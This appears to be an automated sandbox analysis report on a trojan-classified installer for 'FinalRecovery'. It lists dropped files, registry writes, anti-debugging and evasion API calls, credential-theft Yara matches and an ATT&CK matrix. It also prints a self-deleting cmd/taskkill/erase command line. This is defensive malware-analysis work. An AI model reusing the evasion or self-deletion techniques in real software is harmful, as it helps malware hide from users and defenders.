              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
              Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp
              Source: classification engine | Classification label: mal92.troj.evad.winEXE@12/24@0/4
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00455028 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_01
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409BC4 FindResourceA,SizeofResource,LoadResource,LockResource,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Program Files (x86)\FgasoftFR
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Command line argument: `a}{
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Command line argument: MFE.
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Window found: window name: TMainForm
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: file.exe | Static file information: File size 1825141 > 1048576

              Data Obfuscation

              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fga20:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406590 push 004065CDh; ret
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004080DC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004040B5 push eax; ret
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404185 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404206 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040C218 push eax; ret
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004042E8 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404283 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408F10 push 00408F43h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040992C push 00409969h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040A027 push ds; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00476228 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0045866C push 004586B0h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004106B8 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040A77C push C00040C3h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00412910 push 00412973h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00442A78 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00450B58 push 00450B8Bh; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00450D1C push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00456E00 push 00456E38h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00492EC8 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040D010 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0045F0C0 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040546D push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040F570 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00483538 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040553D push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004055BE push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0040563B push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004056A0 push 00405749h; ret
              Source: finalrecovery.exe.1.dr | Static PE information: section name: .fga20
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: initial sample | Static PE information: section name: .text entropy: 7.3303142565000785
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dll
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_iscrypt.dll
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-H9OSH.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)
              Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0042417C IsIconic,SetActiveWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004241C4 IsIconic,SetActiveWindow,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0041836C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00422844 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00417580 IsIconic,GetCapture,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00481878 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00417CB6 IsIconic,SetWindowPos,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00417CB8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Users\user\Desktop\file.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dll
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-H9OSH.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmp
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,GetUserNameA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409B08 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00423DAD FindFirstFileExW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_10007E39 FindFirstFileExW,
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001782000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0ex
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
              Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_0042039F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F709 SetUnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00476C24 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0042DF9C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,
              Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
              Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager#
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: GetLocaleInfoA,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: GetLocaleInfoA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F773 cpuid
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00457964 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CBC GetVersionExA,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004547B8 GetUserNameA,

              Stealing of Sensitive Information

Source: Yara match | File source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.finalrecovery.exe.19a0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 12 Command and Scripting Interpreter | Logon Script (Windows) | 13 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 23 Software Packing | NTDS | 26 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Masquerading | LSA Secrets | 141 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 13 Process Injection | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 System Owner/User Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 791306 | Sample: file.exe | Startdate: 25/01/2023 | Architecture: WINDOWS | Score: 92
